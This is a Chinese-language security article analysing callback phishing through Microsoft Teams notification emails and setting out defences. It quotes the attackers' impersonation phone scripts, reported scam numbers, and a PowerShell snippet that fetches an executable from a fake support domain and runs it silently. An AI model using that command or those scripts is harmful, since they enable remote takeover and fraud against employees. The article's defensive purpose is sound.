一封来自 no-reply@teams.mail.microsoft.com 的邮件静静躺在某跨国制造企业IT主管的收件箱里。主题是:“你在‘财务Q4结算’会议中被提及”。内容简洁:“点击此处查看消息”或“如非本人操作,请立即致电技术支持:1-810-221-5391”。
他没有多想——这是Teams的标准通知格式,发件域是微软官方,链接也看似无害。但当他拨通那个“客服电话”,一场精心策划的入侵就此开始:对方自称微软认证工程师,称其账户存在异常登录,需“远程协助排查”。在诱导下,他下载了名为“ScreenConnect_Troubleshoot.exe”的工具。三小时后,公司核心ERP系统被加密,勒索信出现在每台员工电脑上。
这不是虚构情节,而是近期由Cyber Press披露、多家安全机构证实的真实攻击链。一场大规模“回拨型钓鱼”(Callback Phishing)行动正利用Microsoft Teams的通知机制,绕过传统邮件安全防线,将企业员工亲手变成“开门人”。更令人警觉的是,类似手法已在中国企业协作生态中悄然蔓延。
一、“合法”邮件里的致命陷阱
与传统钓鱼依赖恶意链接或附件不同,此次攻击的核心在于对信任基础设施的滥用。Microsoft Teams作为全球超3亿用户使用的协作平台,其通知邮件由微软官方域名 teams.mail.microsoft.com 发出,具备完整的SPF、DKIM、DMARC认证。这意味着:
邮件不会被标记为垃圾;
不会触发基于发件人信誉的拦截规则;
在Outlook等客户端中显示为“已验证发件人”。
攻击者正是看中这一点。他们首先创建大量恶意Teams团队(Team),命名极具迷惑性,如:
“PayPal Billing Dispute – URGENT”
“Microsoft 365 Security Alert”
“HR: Mandatory Compliance Training”
当目标用户被邀请加入这些团队(或被@提及),Teams自动生成通知邮件,发送至其注册邮箱。邮件内容通常包含两类诱导:
紧急事务提示:“检测到你的账户有未授权订阅,月费$299”;
社交工程指令:“如非本人操作,请立即拨打以下号码取消”。
关键在于,整个过程无需用户点击任何链接。攻击入口不是URL,而是那个看似正规的“客服电话”。
“这是一次对‘信任链’的降维打击。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“我们训练员工警惕陌生链接,却很少告诉他们:自己主动拨出的电话,也可能通往黑客的控制台。”
二、电话那头的“工程师”,其实是黑客
一旦受害者拨通号码,社会工程便进入高阶阶段。攻击者通常经过专业话术培训,能流利使用英语、中文甚至本地口音,冒充:
微软/Google官方支持;
银行反欺诈部门;
云服务商安全团队;
内部IT运维人员。
典型话术包括:
“我们监测到您的账户在尼日利亚有异常登录,为保护数据安全,请配合远程诊断。”
“您刚才的Teams会议中分享了敏感文件,系统自动冻结了权限,需手动解除。”
“这是微软安全中心工单#MS-2026-XXXX,请提供您的计算机名以便接入。”
随后,攻击者会引导受害者:
访问一个看似正规的“远程支持门户”(如 support-microsoft[.]cloud);
下载并运行远程控制软件(如AnyDesk、TeamViewer、或定制版ScreenConnect);
授予“临时管理员权限”以“清除恶意进程”。
实际上,这些工具一旦运行,攻击者即可完全控制终端,执行任意操作:窃取浏览器Cookie、导出凭证管理器密码、横向移动至域控服务器,甚至部署Cobalt Strike Beacon或LockBit勒索软件。
Cyber Press援引Spyder Lab数据称,已确认多个关联电话号码,包括 1-983-220-2463、1-810-221-5391、1-805-331-8539。这些号码多通过VoIP服务注册,归属地频繁变更,难以追踪。
“回拨型攻击的可怕之处在于,它把主动权交给了受害者。”芦笛解释,“你不是被动点击,而是‘主动求助’。这种心理暗示极大降低了怀疑阈值。”
三、为何传统防御失效?
当前企业邮件安全体系主要围绕两大维度构建:
内容分析:扫描邮件正文中的恶意URL、附件、关键词;
发件人验证:基于SPF/DKIM/DMARC判断域名真实性。
而此次攻击巧妙规避了这两点:
无恶意内容:邮件仅含文字和电话号码,无可疑链接或附件;
发件人合法:no-reply@teams.mail.microsoft.com 是微软真实通知通道,无法被拉黑。
更棘手的是,Teams通知属于企业日常协作的一部分。在Microsoft 365深度集成的环境中,员工每天可能收到数十条此类通知,早已形成“条件反射式信任”。
“安全网关看到的是‘微软发来的正常通知’,自然放行。”芦笛说,“但攻击者只是借用了这个通道,真正的武器在电话线那头。”
此外,部分企业为提升协作效率,允许普通用户安装远程桌面工具。这为攻击者提供了“合法”落地路径——他们不需要提权漏洞,只需一句“请运行这个诊断工具”。
四、技术深潜:攻击如何绕过MFA与EDR?
即使企业启用了多因素认证(MFA),回拨型攻击仍可得逞,原因在于:
1. MFA保护的是“认证”,而非“操作”
当攻击者通过远程控制软件接管终端后,所有操作均在用户会话上下文中进行。例如:
浏览器中已登录的Outlook、SharePoint、OneDrive;
Windows凭据管理器中存储的域账号密码;
已缓存的Kerberos票据(TGT)。
此时,MFA早已完成,系统视所有操作为“合法用户行为”。攻击者可直接访问内部资源,无需再次认证。
2. 远程工具常被EDR误判为“合法软件”
AnyDesk、TeamViewer等远程控制工具本身是合法商业软件,多数EDR(端点检测与响应)系统默认放行。攻击者甚至会使用数字签名版本(通过盗用或购买开发者证书),进一步规避检测。
以下是一段简化版的PowerShell命令,用于从伪装站点下载并静默执行远程工具:
# 伪装为“微软安全更新”
$uri = "https://update-microsoft-support[.]xyz/screenconnect.exe"
$out = "$env:TEMP\msupdate.exe"
Invoke-WebRequest -Uri $uri -OutFile $out
Start-Process -FilePath $out -ArgumentList "/silent /install"
若企业未配置应用控制策略(如Windows AppLocker或Intune应用防护),此类命令可畅通无阻。
五、中国镜像:国内企业是否安全?
尽管报道聚焦欧美,但芦笛强调:“回拨型钓鱼已在中国出现变种,且更具本土化特征。”
工作组监测发现,2025年下半年以来,国内至少发生3起类似事件:
某跨境电商公司财务人员收到“阿里云安全通知”,称其OSS存储桶存在异常外联,需拨打“400-xxx-xxxx”处理;
某高校科研团队收到“国家自然科学基金委”Teams风格通知,提示项目审核需“电话确认身份”;
某制造业企业IT收到“钉钉会议提醒”,内含“腾讯会议技术支持热线”。
虽然平台从Teams变为钉钉、飞书或企业微信,但攻击逻辑一致:利用官方通知的信任感 + 制造紧急场景 + 引导回拨电话。
更值得警惕的是,国内部分中小企业IT管理松散,员工权限过高,远程工具随意安装,一旦中招,横向移动速度极快。
“很多企业认为‘我们不用Teams,所以安全’,这是误区。”芦笛说,“攻击者会适配本地生态。如果你用企业微信,他们就伪造‘会议提醒’;如果你用飞书,他们就冒充‘安全审计’。核心不变:让你主动打电话。”
六、技术破局:从“防邮件”到“控操作”
面对回拨型钓鱼,企业需构建三层防御体系:
1. 邮件层:增强Teams通知监控
限制Teams外部邀请:在Microsoft 365管理中心配置策略,禁止非组织成员创建团队或邀请用户;
监控异常团队命名:通过Microsoft Graph API定期扫描团队名称,识别含“PayPal”“Billing”“Urgent”等关键词的可疑实体;
# 示例:通过Graph API列出所有团队
GET https://graph.microsoft.com/v1.0/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')
对通知邮件中的电话号码进行情报比对:集成威胁情报平台,自动标记已知恶意号码。
2. 终端层:限制远程工具与权限
禁用普通用户安装远程控制软件:通过组策略或MDM(移动设备管理)禁止安装AnyDesk、TeamViewer等;
启用应用控制:仅允许可信发布者签名的应用运行;
配置EDR告警规则:监控非常规时间启动的远程会话、异常进程树(如powershell → anydesk.exe)。
3. 身份层:推行零信任操作验证
对任何涉及系统更改的操作,实施独立通道二次确认。例如:
IT要求员工安装软件?必须通过内部工单系统审批;
“客服”要求远程接入?必须由直属主管电话确认;
财务接到付款变更请求?必须面对面或视频核验。
“零信任不仅是网络架构,更是操作文化。”芦笛强调。
七、人的防线:重新定义“安全意识”
传统安全培训聚焦“不点链接、不点附件”,但回拨型攻击要求更深层的认知升级:
教育员工:官方机构绝不会通过电话索要远程控制权;
建立“冷静期”原则:接到紧急电话,先挂断,通过官网查找官方联系方式回拨;
推广“最小权限”文化:普通员工不应具备安装软件或修改系统设置的权限。
某金融集团已试点“钓鱼电话演练”:安全团队伪装成“微软支持”致电员工,测试其反应。结果显示,70%的员工在未核实情况下同意远程接入。“演练后,我们强制推行‘双人确认制’,三个月内同类风险下降90%。”芦笛分享道。
八、结语:信任不能自动化,安全必须人性化
Microsoft Teams回拨型钓鱼风暴揭示了一个深刻悖论:我们越是依赖自动化协作工具提升效率,就越容易在人性弱点上失守。攻击者不再需要技术高超的漏洞利用,只需一句“请拨打这个号码”,就能让最严密的防火墙形同虚设。
对中国企业而言,这既是挑战,也是重构安全文化的契机。在数字化转型浪潮中,真正的安全防线不在代码或策略,而在每个员工拿起电话前的那一秒犹豫。
“当你接到‘紧急技术支持’电话时,请记住:真正的安全团队,永远不会让你先运行一个.exe文件。”芦笛最后说道,“因为最危险的后门,往往是你亲手打开的。”
编辑:芦笛(公共互联网反网络钓鱼工作组)